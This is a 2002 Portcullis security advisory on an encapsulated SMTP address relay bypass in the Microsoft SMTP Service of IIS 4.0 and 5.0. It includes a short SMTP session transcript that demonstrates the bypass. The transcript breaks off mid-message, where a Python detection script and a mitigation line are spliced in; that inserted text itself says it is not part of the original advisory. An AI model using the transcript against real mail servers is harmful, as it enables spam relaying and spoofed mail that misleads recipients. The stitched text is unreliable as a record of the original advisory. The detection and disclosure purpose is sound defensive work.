Portcullis Security Advisory - IIS Microsoft SMTP Service Encapsulated SMTP Address Vulnerability

From: JWC@portcullis-security.com
Date: Fri Jul 12 2002 - 05:45:06 PDT


    			Portcullis Security Advisory
    
    IIS Microsoft SMTP Service Encapsulated SMTP Address Vulnerability
    
    Update to Microsoft Security Bulletin (MS99-027): 
    NT Exchange Server Encapsulated SMTP Address Vulnerability.
    
    Vulnerability discovery and development: 
    
    Thomas Liam Romanis (Security Testing Services Manager)
    Geoff M Webb (Technical Manager)
    James R Turner (Senior Technical Engineer)
    
    Affected systems: 
    
    IIS 4.0
    Microsoft SMTP Service
    
    IIS 5.0
    Microsoft SMTP Service
    
    IIS 5.1
    Microsoft SMTP Service not tested yet.
    
    Details:
    
    Laurent Frinking of Quark Deutschland GmbH originally discovered this
    vulnerability. At that time the discovery concerned all versions of
    Microsoft Exchange 5.5 prior to SP2 with the SP2 IMC patch. 
    
    Portcullis have discovered that the Microsoft SMTP Service available with
    IIS 4.0 and IIS 5.0 is also vulnerable to the encapsulated SMTP address
    vulnerability even with anti-relaying features enabled. 
    This vulnerability allows hosts that are not authorized to relay e-mail via
    the SMTP server to bypass the anti-relay features and send mail to foreign
    domains.
    
    Impact:
    
    The anti-relay rules will be circumvented allowing spam and spoofed mail to
    be relayed via the SMTP mail server. 
    
    Spam Mail:
    If the Microsoft IIS SMTP Server is used to relay spam mail this could
    result in the mail server being black holed causing disruption to the
    service.
    
    Spoofed e-mail:
    As the Microsoft IIS SMTP Service is most often used alongside IIS in
    commercial deployments, this flaw could be used to social-engineer
    customers, particularly because spoofed e-mail relayed in this way will
    show the trusted web server in the SMTP headers. 
    
    Exploit:
    
    220 test-mailer Microsoft ESMTP MAIL Service, Version: 5.0.2195.4905 ready at Tue, 28 May 2002 14:54:10 +0100
    helo
    250 test-mailer Hello [IP address of source host]
    MAIL FROM: testat_private
    250 2.1.0 testat_private OK
    RCPT TO: test2at_private
    550 5.7.1 Unable to relay for testat_private
    RCPT TO: IMCEASMTP-test+40test+2Ecomat_private
    250 2.1.5 IMCEASMTP-test+40test+2Ecomat_private
    data
    354 Start mail input; end with <CRLF>.<CRLF>
    Subject: You are vulnerable.
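    The following is an added detection example, not part of the original advisory: it decodes IMCEA-style recipients from an SMTP session log and flags the ones whose decoded address points outside the server's own domains, i.e. the relay bypass shown above. The "+XX" hex decoding is inferred from the advisory's transcript (+40 is "@", +2E is "."), and the domains and session lines are constructed placeholders.

```python
import re

# Assumed from the advisory's transcript: an encapsulated recipient looks like
# IMCEA<type>-<encoded address>@<local domain>, where each "+XX" is the hex
# code of one character ("+40" -> "@", "+2E" -> ".").
IMCEA_RE = re.compile(r"^IMCEA([A-Z0-9]+)-(.+)$", re.IGNORECASE)
HEX_RE = re.compile(r"\+([0-9A-Fa-f]{2})")


def decode_imcea(local_part):
    """Return (address type, decoded address) for an IMCEA local part, else None."""
    m = IMCEA_RE.match(local_part)
    if not m:
        return None
    decoded = HEX_RE.sub(lambda h: chr(int(h.group(1), 16)), m.group(2))
    return m.group(1).upper(), decoded


def relay_target(rcpt, local_domains):
    """Foreign address reached through an encapsulated recipient, or None."""
    rcpt = rcpt.strip().strip("<>")
    if "@" not in rcpt:
        return None
    local_part, _outer_domain = rcpt.rsplit("@", 1)
    dec = decode_imcea(local_part)
    if dec is None:
        return None
    addr_type, inner = dec
    if addr_type != "SMTP" or "@" not in inner:
        return None
    if inner.rsplit("@", 1)[1].lower() in local_domains:
        return None  # decodes to one of our own domains: not a relay
    return inner


def scan_session(lines, local_domains):
    """Walk RCPT TO lines of a session and collect foreign targets reached via encapsulation."""
    hits = []
    for line in lines:
        m = re.match(r"^\s*RCPT TO:\s*(.+)$", line, re.IGNORECASE)
        if m:
            target = relay_target(m.group(1), local_domains)
            if target:
                hits.append(target)
    return hits


# Constructed session mirroring the advisory; all domains are placeholders.
LOCAL_DOMAINS = {"test-mailer.example"}
SESSION = [
    "MAIL FROM: sender@remote.example",
    "RCPT TO: user@foreign.example",  # plain relay attempt, server answers 550
    "RCPT TO: IMCEASMTP-test+40test+2Ecom@test-mailer.example",  # bypass
    "RCPT TO: IMCEASMTP-user+40test-mailer+2Eexample@test-mailer.example",
]

if __name__ == "__main__":
    for addr in scan_session(SESSION, LOCAL_DOMAINS):
        print("encapsulated relay to", addr)
```

    The same check applied at RCPT time on the server side, rejecting any IMCEASMTP recipient that decodes to a non-local domain, is the corresponding mitigation.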
    
    
    Copyright © Portcullis Computer Security Limited 2002, All rights reserved
    worldwide.
    
    Permission is hereby granted for the electronic redistribution of this
    information. It is not to be edited or altered in any way without the
    express written consent of Portcullis Computer Security Limited. 
    
    Disclaimer: The information herein contained may change without notice. Use
    of this information constitutes acceptance for use in an AS IS condition.
    There are NO warranties, implied or otherwise, with regard to this
    information or its use. Any use of this information is at the user's risk.
    In no event shall the author/distributor (Portcullis Computer Security
    Limited) be held liable for any damages whatsoever arising out of or in
    connection with the use or spread of this information.
    
    John Clayton
    Portcullis Computer Security Ltd.
    Security Testing Services Team Leader and 
    Dragon IDS Technical Product Manager
    www.portcullis-security.com
    